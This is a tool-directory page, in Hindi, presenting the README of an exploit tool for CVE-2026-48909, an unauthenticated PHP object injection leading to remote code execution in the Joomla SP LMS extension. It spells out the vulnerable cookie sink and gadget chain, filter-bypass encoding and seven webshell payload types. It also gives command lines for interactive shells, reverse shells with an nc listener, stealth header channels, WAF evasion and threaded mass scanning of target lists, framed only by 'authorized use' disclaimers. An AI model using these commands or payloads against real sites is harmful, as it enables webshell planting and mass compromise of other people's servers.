Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Joomla SP LMS एक्सटेंशन संस्करण <= 4.1.3 के लिए बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन से RCE शोषण। lmsOrders कुकी डीसेरिएलाइज़ेशन का फायदा उठाकर Joomla FormattedtextLogger गैजेट श्रृंखला के माध्यम से वेबशेल लिखता है। इंटरैक्टिव शेल, पथ खोज और सफाई शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
भेद्यता विश्लेषणकोड विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

रिपॉजिटरी देखें
221 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-48909 - Joomla SP LMS एक्सटेंशन संस्करण <= 4.1.3 के लिए बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन से RCE शोषण। lmsOrders कुकी डीसेरिएलाइज़ेशन का फायदा उठाकर Joomla FormattedtextLogger गैजेट श्रृंखला के माध्यम से वेबशेल लिखता है। इंटरैक्टिव शेल, पथ खोज और सफाई शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

CVE-2026-48909

Joomla SP LMS — अनधिकृत PHP ऑब्जेक्ट इंजेक्शन → RCE

Python Version CVSS License Platform

CVE-2026-48909 के लिए प्रूफ-ऑफ-कॉन्सेप्ट मूल्यांकन उपकरण
लेखक: सुदीपा वानीगरथना

joomla1

[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन सिस्टमों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेता है।


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएं
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग मार्गदर्शिका
  • कमांड संदर्भ
  • पेलोड प्रकार
  • हमला श्रृंखला
  • आउटपुट उदाहरण
  • समस्या निवारण
  • भंडार लेआउट
  • संस्करण इतिहास
  • अस्वीकरण
  • लेखक

अवलोकन

CVE-2026-48909 Joomla SP LMS एक्सटेंशन में एक गंभीर अनधिकृत PHP ऑब्जेक्ट इंजेक्शन है। यह उपकरण पूर्ण हमला श्रृंखला को लागू करता है ताकि सुरक्षा पेशेवर प्रयोगशाला या अधिकृत वातावरण में प्रभाव को मान्य कर सकें।

यह डिटेक्शन, पथ खोज, पेलोड वितरण, इंटरैक्टिव पोस्ट-एक्सप्लॉइटेशन (जहां अनुमति हो), सामूहिक मूल्यांकन, और वैकल्पिक सफाई को कवर करता है।


भेद्यता विवरण

गुणमान
CVE IDCVE-2026-48909
CVSS9.5 (गंभीर)
हमला वेक्टरनेटवर्क - अनधिकृत
प्रभावरिमोट कोड निष्पादन
प्रभावित उत्पादJoomla SP LMS
प्रभावित संस्करण1.0.0 – 4.1.3
पैच किया गया संस्करणSP LMS 4.1.4+
गैजेट श्रृंखलाJoomla < 5.2.2 आवश्यक

संगतता मैट्रिक्स

घटकसंस्करणRCE
SP LMS< 4.1.4असुरक्षित
SP LMS≥ 4.1.4पैच किया गया
Joomla< 5.2.2गैजेट श्रृंखला उपयोग योग्य
Joomla≥ 5.2.2गैजेट श्रृंखला पैच किया गया

विशेषताएं

मुख्य

क्षमताविवरण
अनधिकृत शोषणकोई क्रेडेंशियल आवश्यक नहीं
एकाधिक पेलोड7 वेबशेल / निष्पादन वेरिएंट
इंटरैक्टिव शेलतैनाती के बाद कमांड इतिहास सत्र
पथ खोजस्वचालित लेखन योग्य पथ जांच
सफाईपरीक्षण के बाद तैनात वेबशेल हटाएं

मूल्यांकन और संचालन

क्षमताविवरण
सामूहिक स्कैनिंगबहु-थ्रेडेड लक्ष्य सूचियां (1000+)
प्रॉक्सी समर्थनHTTP/SOCKS (Burp, ZAP, आदि)
रिवर्स शेललिसनर-आधारित पेलोड
स्टील्थ मोडहेडर / POST-उन्मुख कमांड चैनल
रैंडमाइज़ेशनUUID शेल नाम, User-Agent रोटेशन
रिपोर्टिंगJSON, HTML, या CSV के रूप में निर्यात
डिटेक्शन सहायताJoomla संस्करण जांच, --check-only, --safe-mode

एवेज़न नोट्स

  • जहां संभव हो Joomla के cmd फ़िल्टर द्वारा अवरुद्ध वर्णों से बचता है
  • बेस64 पैडिंग / स्लैश समस्याओं को कम करने के लिए हेक्स-एन्कोडेड PHP लेखन पथ
  • कॉन्फ़िगरेबल विलंब और घूर्णनशील User-Agents
  • कई इंजेक्शन / पथ उम्मीदवारों में पुनः प्रयास तर्क

स्थापना

आवश्यक शर्तें

  • Python 3.6+
  • pip
  • परीक्षण के तहत लक्ष्य(ओं) तक नेटवर्क पहुंच

सेटअप

root@kitploit:~
cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

निर्भरताएं

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

argparse Python मानक पुस्तकालय के साथ आता है; इसे pip के माध्यम से स्थापित करने की आवश्यकता नहीं है।


त्वरित प्रारंभ

https://target.example को केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।

एकल लक्ष्य — पथ खोजें + इंटरैक्टिव शेल

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

सुरक्षित जाँच (कोई शोषण नहीं)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

सामूहिक स्कैन

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

रिवर्स शेल (अधिकृत प्रयोगशाला)

root@kitploit:~
# लिसनर
nc -lvnp 4444

# शोषण होस्ट
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

उपयोग मार्गदर्शिका

पथ खोज

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

ज्ञात लेखन योग्य पथ

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

इंटरैक्टिव सत्र

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

एक-शॉट कमांड

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

स्टील्थ पेलोड + इंटरैक्टिव

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

प्रॉक्सी (Burp / ZAP)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

सफाई

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

लक्ष्य सूची प्रारूप

root@kitploit:~
https://lab-a.example
https://lab-b.example
https://lab-c.example
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

कमांड संदर्भ

लक्ष्य

तर्कविवरण
targetएकल लक्ष्य URL
--targets, -T FILEलक्ष्यों की फ़ाइल (प्रति पंक्ति एक URL)
--path PATHवेबशेल के लिए पूर्ण सर्वर पथ
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEवेबशेल फ़ाइल नाम (डिफ़ॉल्ट: x.php)

नेटवर्क

तर्कविवरण
--timeout SECONDSअनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--insecureTLS प्रमाणपत्र सत्यापन छोड़ें
--proxy URLउदा. http://127.0.0.1:8080
--random-uaUser-Agent घुमाएं (डिफ़ॉल्ट रूप से सक्षम)
--delay SECONDSअनुरोधों के बीच देरी

रिवर्स शेल

तर्कविवरण
--reverse-host HOSTलिसनर होस्ट
--reverse-port PORTलिसनर पोर्ट

मोड

तर्कविवरण
--interactive, -iतैनाती के बाद इंटरैक्टिव शेल
--check-onlyकेवल भेद्यता जांच
--safe-modeगैर-विनाशकारी परीक्षण
--find-pathस्वचालित रूप से लेखन योग्य पथ खोजें
--cmd COMMANDएक कमांड चलाएं और बाहर निकलें
--cleanup PATHपथ पर वेबशेल हटाएं
--cleanup-afterशोषण के बाद सफाई

सामूहिक स्कैन / रिपोर्ट

तर्कविवरण
--threads NUMकार्यकर्ता थ्रेड (डिफ़ॉल्ट: 10)
--export FILEपरिणामों के लिए आउटपुट पथ
--export-format FORMATjson, html, csv (डिफ़ॉल्ट: json)

लॉगिंग

तर्कविवरण
--log-file FILEलॉग फ़ाइल में लिखें
--quiet, -qशांत मोड
--verbose, -vविस्तृत आउटपुट
--no-bannerबैनर छुपाएं

पेलोड प्रकार

प्रकारव्यवहारविशिष्ट उपयोग
minimalकॉम्पैक्ट GET-आधारित निष्पादनतंग जगह / त्वरित परीक्षण
standardGET + POST cmd (डिफ़ॉल्ट)सामान्य मूल्यांकन
stealthX-Cmd हेडर के माध्यम से कमांडURL लॉगिंग कम करें
base64POST के माध्यम से eval(base64_decode(...))फ़िल्टर एवेज़न लैब्स
fullGET/POST + बेस64 चैनलव्यापक नियंत्रण
reverseकनेक्ट-बैक शेलस्थायी प्रयोगशाला पहुंच
blindshellवैकल्पिक समावेशन / निष्पादन पैटर्नसीमित वातावरण
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

हमला श्रृंखला

root@kitploit:~
flowchart TD
    A["हमलावर-नियंत्रित lmsOrders कुकी"] --> B["cart.php में unserialize()"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — PHP ड्रॉप"]
    D --> E["डिस्क पर वेबशेल"]
    E --> F["रिमोट कमांड निष्पादन"]

तकनीकी सारांश

  1. सिंक — components/com_splms/models/cart.php बेस64-डीकोडेड lmsOrders कुकी को अनसीरियलाइज़ करता है।
  2. गैजेट — Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() फ़ाइल सिस्टम लेखन को ट्रिगर करता है।
  3. पेलोड — PHP बॉडी हेक्स-एन्कोडेड, लंबाई-पैडेड फ़िल्टर किए गए बेस64 वर्णों (/, =, +) से बचने के लिए।
  4. निष्पादन — OS कमांड चलाने के लिए ड्रॉप की गई स्क्रिप्ट का अनुरोध किया जाता है।

इनपुट फ़िल्टर बाईपास (उच्च स्तर)

Joomla का cmd फ़िल्टर /, =, और + को हटा सकता है। यह उपकरण इसके द्वारा क्षतिपूर्ति करता है:

  • लेखन सामग्री को हेक्स के रूप में एन्कोड करना
  • अवैध वर्णों से बचने के लिए सीरियलाइज़्ड / बेस64 रूपों को पैड करना
  • फ़िल्टर-सुरक्षित पेलोड उत्पन्न होने तक उम्मीदवारों को दोहराना

आउटपुट उदाहरण

इंटरैक्टिव सत्र

root@kitploit:~
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit

JSON निर्यात (आकृति)

root@kitploit:~
{
  "timestamp": "2026-07-16T10:30:00.123456",
  "target": "https://lab.example",
  "shell_path": "/tmp/x_abc123def.php",
  "shell_url": "https://lab.example/tmp/x_abc123def.php",
  "shell_type": "standard",
  "vulnerable": true,
  "exploited": true,
  "joomla_version": "4.3.2",
  "detected_paths": [
    "/tmp/x_abc123def.php",
    "/images/x_abc123def.php",
    "/cache/x_abc123def.php"
  ],
  "author": "Sudeepa Wanigarathna",
  "tool_version": "3.0"
}

एक-शॉट कमांड

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

समस्या निवारण

लक्षणक्या प्रयास करें
फ़िल्टर-सुरक्षित पेलोड उत्पन्न नहीं कर सकाअलग --path, या --find-path; असामान्य पथ वर्णों से बचें
शेल सत्यापन विफल--timeout बढ़ाएँ; --shell-type standard आज़माएँ; system() / समान अक्षम नहीं है इसकी पुष्टि करें; लेखन योग्यता सत्यापित करें
लक्ष्य असुरक्षित प्रतीत नहीं होताSP LMS ≤ 4.1.3, Joomla < 5.2.2, com_splms मौजूद; WAF ब्लॉक का निरीक्षण करें
HTTP 500--insecure, --timeout 30, एप्लिकेशन/सर्वर लॉग की समीक्षा करें
प्रॉक्सी कनेक्शन अस्वीकृतप्रॉक्सी सुन रही है इसकी पुष्टि करें; URL स्कीम/होस्ट/पोर्ट सही है
TLS सत्यापन विफलटूटे हुए प्रमाणपत्रों वाले प्रयोगशाला एंडपॉइंट के लिए --insecure जोड़ें

डीबग वर्कफ़्लो

root@kitploit:~
# विस्तृत + फ़ाइल लॉग
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path -v --log-file debug.log

# Burp के माध्यम से
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path \
  --proxy http://127.0.0.1:8080 --insecure -v

# पहले गैर-विनाशकारी
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

भंडार लेआउट

root@kitploit:~
exploit/
├── CVE-2026-48909 v3.0.py   # मुख्य उपकरण (v3.0)
├── requirements.txt         # Python निर्भरताएं
├── README.md                # यह फ़ाइल
└── venv/                    # स्थानीय वर्चुअलएनवी (वैकल्पिक, प्रतिबद्ध नहीं)

सार्वजनिक रिलीज़ के लिए वैकल्पिक जोड़:

root@kitploit:~
targets.txt.example
docs/technical-details.md
examples/basic-exploit.sh
examples/mass-scan.sh

संस्करण इतिहास

v3.0.0 — अल्टीमेट संस्करण (जुलाई 2026)

  • थ्रेडिंग के साथ सामूहिक स्कैनिंग
  • HTTP/SOCKS प्रॉक्सी समर्थन
  • रिवर्स शेल पेलोड
  • WAF-उन्मुख एवेज़न सहायक
  • इंटरैक्टिव स्टील्थ शेल
  • स्वचालित सफाई विकल्प
  • JSON / HTML / CSV रिपोर्टिंग
  • विस्तारित लेखन योग्य पथ सूची
  • Joomla संस्करण डिटेक्शन सहायता
  • सुरक्षित मोड और User-Agent रोटेशन
  • कॉन्फ़िगरेबल अनुरोध विलंब

v2.1 — प्रोफेशनल संस्करण (जुलाई 2026)

  • पेलोड जनरेशन फिक्स
  • मजबूत त्रुटि प्रबंधन और लॉगिंग

अस्वीकरण

यह प्रोजेक्ट जैसा है रक्षात्मक सुरक्षा अनुसंधान और अधिकृत प्रवेश परीक्षण के लिए प्रदान किया गया है।

इस सॉफ़्टवेयर का उपयोग करके आप सहमत हैं कि:

  1. आप केवल उन सिस्टमों को लक्षित करेंगे जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आप स्पष्ट रूप से अधिकृत हैं।
  2. आप लागू कंप्यूटर-दुरुपयोग और डेटा-सुरक्षा कानूनों को समझते हैं।
  3. लेखक और योगदानकर्ता दुरुपयोग से होने वाली क्षति, डेटा हानि, या कानूनी परिणामों के लिए जिम्मेदार नहीं हैं।

यदि आप इस भेद्यता को वास्तविक वातावरण में खोजते हैं, तो जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और जहां उपयुक्त हो विक्रेता / CERT के साथ समन्वय करें।


लेखक

सुदीपा वानीगरथना
सुरक्षा शोधकर्ता · एथिकल हैकिंग · भेद्यता अनुसंधान · Python उपकरण


समर्थन

  • यदि यह आपके शोध में मदद करता है तो भंडार को स्टार करें
  • बग या गलत सकारात्मक के लिए मुद्दे खोलें
  • दस्तावेज़ीकरण, डिटेक्शन सटीकता, और अधिकृत-लैब UX के लिए PR का स्वागत है

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें